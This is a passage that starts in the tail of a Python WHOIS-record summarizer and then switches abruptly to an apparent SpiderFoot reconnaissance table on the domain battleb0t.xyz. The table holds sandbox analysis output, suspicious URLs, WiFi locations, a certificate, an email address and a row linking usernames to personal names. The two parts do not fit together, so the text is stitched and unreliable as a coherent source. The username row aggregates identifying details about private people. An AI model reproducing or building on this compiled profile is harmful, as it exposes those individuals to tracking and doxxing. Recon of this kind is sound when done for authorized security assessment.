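               for s in rec.get("Domain Status", []))


def uses_privacy_service(rec) -> bool:
    blob = " ".join(first(rec, k) or "" for k in
                    ("Registrant Name", "Registrant Organization", "Registrant Email")).lower()
    return any(marker in blob for marker in PRIVACY_MARKERS)


def nameserver_providers(rec) -> list[str]:
    """Collapse name servers to their parent zone (kim.ns.cloudflare.com ->
    cloudflare.com).  Last two labels only: fine under .com, wrong under a
    multi-label public suffix such as .co.uk, where the PSL is needed."""
    return sorted({".".join(ns.lower().rstrip(".").split(".")[-2:])
                   for ns in rec.get("Name Server", [])})


def expiry_skew_hours(registry, registrar) -> float:
    """Registry and registrar expiry stamps normally differ by hours (the
    NOTICE in the record explains why); a gap of days is worth a look."""
    a = parse_ts(first(registry, "Registry Expiry Date"))
    b = parse_ts(first(registrar, "Registrar Registration Expiration Date"))
    return abs((a - b).total_seconds()) / 3600


def summarize(registry_text: str, registrar_text: str) -> dict:
    reg, rar = parse_whois(registry_text), parse_whois(registrar_text)
    return {
        "domain": (first(reg, "Domain Name") or "").lower(),
        "age_days": domain_age_days(reg),
        "transfer_locked": is_transfer_locked(reg),
        "privacy_service": uses_privacy_service(rar),
        "dns_providers": nameserver_providers(reg),
        "dnssec": first(reg, "DNSSEC"),
        "expiry_skew_hours": round(expiry_skew_hours(reg, rar), 2),
    }


if __name__ == "__main__":
    for k, v in summarize(REGISTRY_RECORD, REGISTRAR_RECORD).items():
        print(f"{k:20} {v}")
```

Run as a script it prints the summary for the record above: a domain registered in 2018, transfer-locked, behind a registrar privacy proxy, on Cloudflare name servers without DNSSEC, with the two expiry stamps about 17 hours apart, which is the benign skew the record's NOTICE describes rather than a discrepancy to chase.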
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | ask.fm (Category: social)
https://ask.fm/ayhu | ayhu |
| 2023-05-12 02:59:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://agretermco.com/?ud=PN6m0hZcGA8vvPdtJgFGz92gcS&e=8b2395da&h=a67b717b&f=y&p=n', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 2300 -s 132" (UID: 00000000-00002136)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCDC7.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_50c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_50c_IESQMMUTEX_0_303"\n "IsoScope_50c_IESQMMUTEX_0_519"\n "IsoScope_50c_ConnHashTable<1292>_HashTable_Mutex"\n 
"IsoScope_50c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_50c_IE_EarlyTabStart_0xfd8_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1292"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00002136) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00001292-00000BCA-31267394\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00001292-00000BCA-31268488'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 2300 -s 132" (UID: 00000000-00002136)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabCDC6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"9VHR8B4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9VHR8B4B.txt]- [targetUID: 00000000-00001292]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002388]\n "IQO9YSQA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQO9YSQA.txt]- [targetUID: 00000000-00001292]\n "~DF08918F10D128602A.TMP" has type "data"- Location: [%TEMP%\\~DF08918F10D128602A.TMP]- [targetUID: 00000000-00001292]\n 
"80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001292]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001292]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001292]\n "~DFC9A238F73E498DE2.TMP" has type "data"- Location: [%TEMP%\\~DFC9A238F73E498DE2.TMP]- [targetUID: 00000000-00001292]\n "7OCETGYM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7OCETGYM.txt]- [targetUID: 00000000-00001292]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001292]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001292]\n "CabCDC6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabCDC6.tmp]- [targetUID: 00000000-00002388]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002388]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002388]\n 
"61DA5DFAF74A80490B74893AB3138953" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\61DA5DFAF74A80490B74893AB3138953]- [targetUID: 00000000-00002388]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001292]\n "~DF9ACEEE1176E79600.TMP" has type "data"- Location: [%TEMP%\\~DF9ACEEE1176E79600.TMP]- [targetUID: 00000000-00001292]\n "TarCDC7.tmp" has type "data"- Location: [%TEMP%\\TarCDC7.tmp]- [targetUID: 00000000-00002388]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://agretermco.com/?ud=PN6m0hZcGA8vvPdtJgFGz92gcS&e=8b2395da&h=a67b717b&f=y&p=n"- [Source: Input]\n Pattern match: "https://agretermco.com"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 7, u'description': u'TCP traffic to 34.74.170.74 on port 443 is sent without HTTP header'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: http://fantastic-croquembouche-4fbca6.netlify.app/ (AV positives: 5/88 scanned on 08/03/2022 
15:39:24)\n URL: http://fanciful-torte-7830d3.netlify.app/?naps (AV positives: 3/88 scanned on 08/03/2022 14:54:22)\n URL: https://helpful-begonia-df9d89.netlify.app/?naps (AV positives: 6/89 scanned on 08/03/2022 13:53:18)\n URL: https://jolly-hotteok-091832.netlify.app/?naps (AV positives: 4/89 scanned on 08/03/2022 13:49:20)\n URL: https://wondrous-manatee-be49bf.netlify.app/?naps (AV positives: 6/8 | 34.74.170.74 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:33:68:60) | 39.0469, -77.4903 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BudgetScottsdale (Net ID: 00:09:5B:29:02:37) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SSR (Net ID: 00:01:E3:51:27:11) | 50.1188, 8.6843 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 90 CW @ 18} | https://pics.battleb0t.xyz/images/withat_4.jpg |
| 2023-05-12 03:10:06 | Malicious IP Address | Yes | VoIPBL OpenPBX IPs | 0 | 1 | 2 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.109.153]
http://www.voipbl.org/update | 185.199.109.153 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi.battleb0t.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | david@14islands.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/form.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ie.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ajax.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/fx_methods.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/deferred.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/zepto.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/data.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/gesture.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/selector.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ios3.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://zeptojs.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates 
mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:120:WilError_01"\n "SM0:6976:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "138.91.254.96:443"\n "185.199.110.153:443"\n "104.21.16.28:443"\n "192.30.255.116:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "ghbtns.com"\n "zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: 
"wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<figure class="highlight"><pre><code class="language-js" data-lang="js"><span class="c1">// autolink everything that looks like a Twitter username</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")\n Found string "<span class="s1">\'$1@<a href="http://twitter.com/$2">$2</a>\'</span><span class="p">)</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: 
wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpzeptojs.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\shopping.js]- [targetUID: 00000000-00004044]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004072]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4044_1336506228\\edge_driver.js]- [targetUID: 00000000-00004044]\n 
"edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_driver.js]- [targetUID: 00000000-00004044]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004072]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004044]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\auto_open_controller.js]- [targetUID: 00000000-00004044]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004044]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004044]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004044]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004044]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004044]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\product_page.js]- 
[targetUID: 00000000-00004044]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004044]\n "load_statistics.db" has type "SQLite 3.x database |
| 2023-05-12 02:46:06 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3a:9c:49:d5:78:f8:ac:5a:ba:61:60:6a:4f:18:04:e8:71:47:
69:62:76:f2:cc:e1:7a:77:c4:76:2d:14:ad:8a:51:f0:c8:e8:
f9:38:53:48:90:b9:69:2e:c4:f1:18:37:86:86:25:90:2d:e5:
dd:87:c3:e4:30:76:38:c5:2d:b9:29:35:8f:95:4f:0a:47:25:
94:fe:7d:19:c2:82:cf:f4:d6:6f:2b:05:f9:ef:21:99:a0:d9:
36:83:ad:ba:2a:71:8c:ce:04:55:e9:a3:ae:0f:98:dd:33:3e:
45:9e:26:1e:62:2f:e5:b0:c1:a2:6e:6b:64:03:05:91:c5:ca:
50:6d:e8:c1:41:d8:07:0e:25:58:e8:76:72:9e:b3:02:79:6d:
1c:be:17:b1:a7:32:cd:3e:e0:3c:2c:87:d6:3f:c4:48:c0:a3:
08:59:a0:4e:0f:07:7f:61:15:d7:87:60:df:16:46:c9:31:1c:
35:61:49:d1:30:f6:df:8b:a1:f3:b4:55:7d:23:f2:7e:02:d1:
77:34:24:b1:27:08:2c:2f:5f:8e:75:03:e6:17:9c:33:bc:f3:
b6:45:1b:5b:14:7b:ab:6c:5f:cc:d8:bb:78:b2:59:03:74:72:
01:65:2e:6e:c2:e6:b0:7e:32:e9:3b:23:f0:2f:a8:b0:4a:66:
8f:c0:d5:69
| battleb0t.xyz |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 0 | 0 | 0 | 0 | None | Kekwltd | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
